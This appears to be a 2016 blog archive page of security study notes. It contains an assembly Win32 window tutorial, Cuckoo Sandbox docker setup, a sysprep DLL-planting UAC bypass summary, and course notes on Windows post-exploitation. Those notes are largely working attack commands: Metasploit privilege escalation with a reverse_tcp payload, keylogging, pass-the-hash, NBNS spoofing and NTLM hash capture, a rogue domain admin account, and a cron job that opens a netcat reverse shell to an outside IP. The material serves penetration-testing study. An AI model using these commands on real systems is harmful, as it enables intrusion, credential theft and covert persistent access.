Month: October 2016

Iczellion Tutorial 3 FASM Solution "Window Procedure"

format PE GUI 4.0
include ‘win32ax.inc’
entry start


section ‘.data’ data readable writable
 wHMain         dd ?
 wHInstance     dd ?
 wTitle         db ‘Tutorial 3.0’, 0
 wClsName       db ‘TUT3’, 0

 wMsg           MSG
 wCls           WNDCLASS

section ‘.code’ code readable executable
 start:
      ;; register the window class
      invoke GetModuleHandleA, NULL
      mov [wHInstance], eax
      mov [wCls.hInstance], eax
      mov [wCls.style], CS_HREDRAW or CS_VREDRAW
      mov [wCls.lpfnWndProc], window_procedure
      mov [wCls.lpszClassName], wClsName
      mov [wCls.hbrBackground], COLOR_WINDOW+1
      invoke LoadIcon, NULL, IDI_APPLICATION
      mov [wCls.hIcon], eax
      invoke LoadCursor, NULL, IDC_ARROW
      mov [wCls.hCursor], eax
      invoke RegisterClass, wCls

     ;; create the main window
     invoke CreateWindowEx,\
            0,\
            wClsName,\
            wTitle,\
            WS_OVERLAPPEDWINDOW,\
            CW_USEDEFAULT,\
            CW_USEDEFAULT,\
            CW_USEDEFAULT,\
            NULL,\
            NULL,\
            [wHInstance],\
            NULL
     mov [wHMain], eax
     invoke ShowWindow, [wHMain], SW_SHOW

     ;; entering the message loop
     window_message_loop_start:
        invoke GetMessage, wMsg, NULL, 0, 0
        or eax, eax
        je window_message_loop_end
        invoke TranslateMessage, wMsg
        invoke DispatchMessage, wMsg
        jmp window_message_loop_start

     window_message_loop_end:
        invoke ExitProcess, 0

    ;; window_procedure
    proc window_procedure, hWnd, uMsg, wParam, lParam
         push ebx esi edi
         cmp [uMsg], WM_DESTROY
         je wmDESTROY

         wmDEFAULT:
                invoke DefWindowProc, [hWnd], [uMsg], [wParam], [lParam]
                jmp wmBYE

        wmDESTROY:
                invoke PostQuitMessage, 0

        wmBYE:
                pop edi esi ebx
                ret
    endp
section ‘.idata’ import data readable writable
library kernel32, ‘kernel32.dll’,\
        user32, ‘user32.dll’

import  kernel32,\
        GetModuleHandleA, ‘GetModuleHandleA’,\
        ExitProcess, ‘ExitProcess’

import  user32,\
        RegisterClass, ‘RegisterClassA’,\
        CreateWindowEx, ‘CreateWindowExA’,\
        DefWindowProc, ‘DefWindowProcA’,\
        ShowWindow, ‘ShowWindow’,\
        LoadCursor, ‘LoadCursorA’,\
        LoadIcon, ‘LoadIconA’,\
        GetMessage, ‘GetMessageA’,\
        TranslateMessage, ‘TranslateMessage’,\
        DispatchMessage, ‘DispatchMessageA’,\
        PostQuitMessage, ‘PostQuitMessage’












Installing Cuckoo Sandbox on Mac OS

Source: https://github.com/blacktop/docker-cuckoo

Thanks to Blacktop for the tip!
curl -sL https://github.com/blacktop/docker-cuckoo/raw/master/docker-compose.yml > docker-compose.yml
$ docker-compose up -d
# Cuckoo API is listening on port 8000 now.
$ curl $(docker-machine ip):8000/cuckoo/status


Useful Commands:



$ docker run -d --name mongo mongo
$ docker run -d --name postgres -e POSTGRES_PASSWORD=cuckoo postgres
$ docker run -d --name elasticsearch elasticsearch
$ docker run -d -v $(pwd)/conf:/cuckoo/conf:ro \
                                --link postgres \
                                -p 8000:1337 \
                                blacktop/cuckoo api
$ docker run -d -v $(pwd)/conf:/cuckoo/conf:ro \
                                --link mongo \
                                --link elasticsearch \
                                -p 80:31337 \
                                blacktop/cuckoo web


docker run blacktop/cuckoo daemon       # start cuckoo.py
docker run blacktop/cuckoo submit       # run utils/submit.py
docker run blacktop/cuckoo process      # run utils/process.py
docker run blacktop/cuckoo api          # starts RESTFull API
docker run blacktop/cuckoo web          # starts web UI
docker run blacktop/cuckoo distributed  # runs distributed/app.py
docker run blacktop/cuckoo stats        # utils/stats.py
docker run blacktop/cuckoo help         # runs cuckoo.py --help

User Account Control Bypass

Source: http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
Goal: Advance knowledge surrounding User Account Control (UAC) bypass techniques.

​Lets begin with the sysprep method which is the most commonly used method of bypassing UAC. Made famous by Leo Davidson in 2009, it involves the following steps:

1. Copy/plant a DLL in the C:\Windows\System32\sysprep directory. The name of the DLL depends on the Windows version:

CRYPTBASE.dll for Windows 7
shcore.dll for Windows 8

2.  Execute sysprep.exe from the above directory. It will load the the above DLL and execute it with elevated privileges. 

In fact, all the UAC bypass methods involve playing with DLL and executable names and locations. See the table below:


Advanced Penetration Testing: Post-Exploitation

Course:  Georgia Weidman on “Advanced Penetration Testing” at Cybrary


(1) Metasploit Scripts:
msf > use post/windows/gather/enum_logged_on_users

(2) Railgun
Extension for Meterpreter that allows access to the Windows API
meterpreter > irb
>> client.railgun.shell32.IsUserAnAdmin

(3) Local Privilege Escalation: GetSystem
meterpreter > getsystem

(4) Local Privilege Escalation: Local Exploits
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp

(5) Local Privilege Escalation: Bypassing UAC
msf >use exploit/windows/local/bypassuac

(6) Local Privilege Escalation: Using a Public Exploit
Public exploit in /usr/share/exploitdb

(7) Local Information Gathering: Searching for Files
meterpreter > search -f *password*

(8) Local Information Gathering: Gathering Passwords
usr/share/metasploit-framework/modules/post/ windows/gather/credentials

(9) Local Information Gathering: Keylogging
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

(10) Lateral Movement: PSExec
msf > use exploit/windows/smb/psexec

(11) Lateral Movement: Pass the Hash
Replace password with the LM:NTLM hash from hashdump
We are still able to authenticate using Psexec

(12) Lateral Movement:Token Impersonation
load incognito
list tokens –u

(13) Lateral Movement: SMB Capture
Set up SMB capture server in Metasploit
Drop into a shell in a session with an impersonated token

(14) Pivoting through Metasploit
route add 172.16.85.0 255.255.255.0 2
Routes traffic to 172.16.85.0/24 network through session 2

(15) Pivoting with socks4a and proxychains
use auxiliary/server/socks4a
Edit /etc/proxychains.conf change port to 1080
proxychains nmap -Pn -sT -sV -p 445,446 172.16.85.190

(16) NBNS Spoofing
Listen for NBNS requests and respond accordingly, can get machines to send hashes or possibly even plaintext
​msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.20.9
msf auxiliary(nbns_response) > exploit
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /root/johnsmb
msf auxiliary(http_ntlm) > exploit
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set LOGFILE /root/httplog
msf auxiliary(http_ntlm) > set URIPATH /
msf auxiliary(http_ntlm) > set SRVPORT 80
msf auxiliary(http_ntlm) > exploit

(17) Responder
Automates NBNS spoofing attacks
cd Responder
python Responder.py –i 192.168.20.9

(A) Persistence: Adding a User
net user john johnspassword /add /domain
net localgroup administrators john /add /domain
Add /domain at the end to add the user to a domain as well

(B) Persistence: With Metasploit Script​
Metasploit persistence script creates an autorun entry in the registry. Not stealthy (writes to a disk)
run persistence -r 192.168.20.9 -p 2345 -U

(C) Persistence: Crontabs
Add to /etc/crontab file
*/10 * * * * root nc 192.168.20.9 12345 -e /bin/bash

service cron restart